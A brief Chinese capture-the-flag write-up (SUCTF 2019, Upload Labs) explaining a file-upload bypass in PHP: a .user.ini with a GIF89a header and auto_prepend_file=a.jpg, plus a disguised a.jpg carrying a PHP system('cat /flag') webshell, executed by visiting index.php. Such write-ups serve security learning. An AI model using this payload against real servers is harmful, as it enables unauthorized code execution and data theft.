利用.user.ini进行文件上传,今天又学到的新知识 SUCTF 2019 Check浅谈.user.ini利用
上传这样一个ini文件
GIF89a auto_prepend_file=a.jpg
再上传一个a.jpg文件
GIF89a
<script language='php'>system('cat /flag')</script>
Upload Labs
注意:上传目录下要有一个正常的php文件,这里为index.php
设置.user.ini为auto_prepend_file=a.jpg,即再文件前面再加上一个.jpg文件
再index.php文件的开始处添加一句话代码
访问上传目录下的index.php文件就可以执行webshell